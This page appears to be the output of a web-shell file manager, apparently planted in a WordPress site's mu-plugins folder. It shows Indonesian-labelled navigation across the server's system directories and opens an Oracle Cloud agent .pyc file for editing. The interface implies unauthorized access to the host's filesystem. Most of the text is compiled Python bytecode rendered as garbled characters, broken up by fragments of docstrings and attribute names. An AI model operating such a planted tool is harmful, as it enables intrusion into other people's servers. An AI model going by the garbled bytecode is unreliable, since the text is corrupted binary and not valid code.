📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
opsi
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/opsi/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: enterprise_manager_bridge.pyc
a O��f|J � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdZdZ dZ d d � Zedd� �Z e jd d� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zed d!� �Zejd"d!� �Zed#d$� �Zejd%d$� �Zed&d'� �Zejd(d'� �Zed)d*� �Zejd+d*� �Zed,d-� �Zejd.d-� �Zed/d0� �Zejd1d0� �Zed2d3� �Zejd4d3� �Zd5d6� Zd7d8� Zd9d:� Zd;S )<�EnterpriseManagerBridgez- Enterprise Manager bridge resource. �CREATING�UPDATING�ACTIVE�DELETING�DELETED�FAILED�NEEDS_ATTENTIONc K s� ddddddddddddddd�| _ dddd d ddd ddddddd�| _d| _d| _d| _d| _d| _d| _d| _d| _ d| _ d| _d| _d| _ d| _d| _dS )aD Initializes a new EnterpriseManagerBridge object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param id: The value to assign to the id property of this EnterpriseManagerBridge. :type id: str :param compartment_id: The value to assign to the compartment_id property of this EnterpriseManagerBridge. :type compartment_id: str :param display_name: The value to assign to the display_name property of this EnterpriseManagerBridge. :type display_name: str :param description: The value to assign to the description property of this EnterpriseManagerBridge. :type description: str :param object_storage_namespace_name: The value to assign to the object_storage_namespace_name property of this EnterpriseManagerBridge. :type object_storage_namespace_name: str :param object_storage_bucket_name: The value to assign to the object_storage_bucket_name property of this EnterpriseManagerBridge. :type object_storage_bucket_name: str :param object_storage_bucket_status_details: The value to assign to the object_storage_bucket_status_details property of this EnterpriseManagerBridge. :type object_storage_bucket_status_details: str :param freeform_tags: The value to assign to the freeform_tags property of this EnterpriseManagerBridge. :type freeform_tags: dict(str, str) :param defined_tags: The value to assign to the defined_tags property of this EnterpriseManagerBridge. :type defined_tags: dict(str, dict(str, object)) :param system_tags: The value to assign to the system_tags property of this EnterpriseManagerBridge. :type system_tags: dict(str, dict(str, object)) :param time_created: The value to assign to the time_created property of this EnterpriseManagerBridge. :type time_created: datetime :param time_updated: The value to assign to the time_updated property of this EnterpriseManagerBridge. :type time_updated: datetime :param lifecycle_state: The value to assign to the lifecycle_state property of this EnterpriseManagerBridge. Allowed values for this property are: "CREATING", "UPDATING", "ACTIVE", "DELETING", "DELETED", "FAILED", "NEEDS_ATTENTION", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type lifecycle_state: str :param lifecycle_details: The value to assign to the lifecycle_details property of this EnterpriseManagerBridge. :type lifecycle_details: str �strzdict(str, str)zdict(str, dict(str, object))�datetime)�id�compartment_id�display_name�description�object_storage_namespace_name�object_storage_bucket_name�$object_storage_bucket_status_details� freeform_tags�defined_tags�system_tags�time_created�time_updated�lifecycle_state�lifecycle_detailsr � compartmentId�displayNamer �objectStorageNamespaceName�objectStorageBucketName� objectStorageBucketStatusDetails�freeformTags�definedTags� systemTags�timeCreated�timeUpdated�lifecycleState�lifecycleDetailsN)� swagger_types� attribute_map�_id�_compartment_id� _display_name�_description�_object_storage_namespace_name�_object_storage_bucket_name�%_object_storage_bucket_status_details�_freeform_tags� _defined_tags�_system_tags� _time_created� _time_updated�_lifecycle_state�_lifecycle_details)�self�kwargs� r<